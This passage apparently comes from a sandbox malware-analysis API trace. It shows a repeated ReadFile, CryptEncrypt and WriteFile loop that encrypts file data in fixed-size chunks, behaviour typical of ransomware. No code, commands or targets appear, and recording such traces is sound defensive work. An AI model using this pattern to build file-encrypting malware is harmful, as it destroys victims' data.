pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.268] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.268] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.268] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.268] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.268] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.268] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.268] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.268] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.269] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.269] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.269] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.269] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.269] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.269] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.269] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.269] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.269] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.269] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.269] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.269] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.269] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.269] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.269] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.269] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.270] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.270] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.270] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.270] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.270] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.270] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.270] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.270] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.270] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.270] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.270] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.270] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.270] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.271] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.271] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.271] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.271] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.271] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.271] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.271] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.271] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.271] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.271] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.271] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.271] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.271] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.271] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.271] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.271] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.271] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.271] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.272] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.272] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.272] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.272] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.272] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.272] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.272] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.272] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.272] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.272] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.272] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.272] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.272] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.273] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.273] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.273] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.273] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.273] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.273] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.273] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.273] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.273] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.273] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.273] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.273] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.273] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.273] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.273] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.273] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.273] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.273] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.273] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.273] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.274] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.274] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.274] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.274] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.274] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.274] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.274] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.274] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.274] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesWritten=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.274] ReadFile (in: hFile=0x5cd8, lpBuffer=0x2795f70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e7ac, lpOverlapped=0x0 | out: lpBuffer=0x2795f70*, lpNumberOfBytesRead=0x2c5e7ac*=0x380, lpOverlapped=0x0) returned 1 [0126.274] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380, dwBufLen=0x400 | out: pbData=0x2795f70*, pdwDataLen=0x2c5e7ac*=0x380) returned 1 [0126.274] WriteFile (in: hFile=0x5cec, lpBuffer=0x2795f70*, 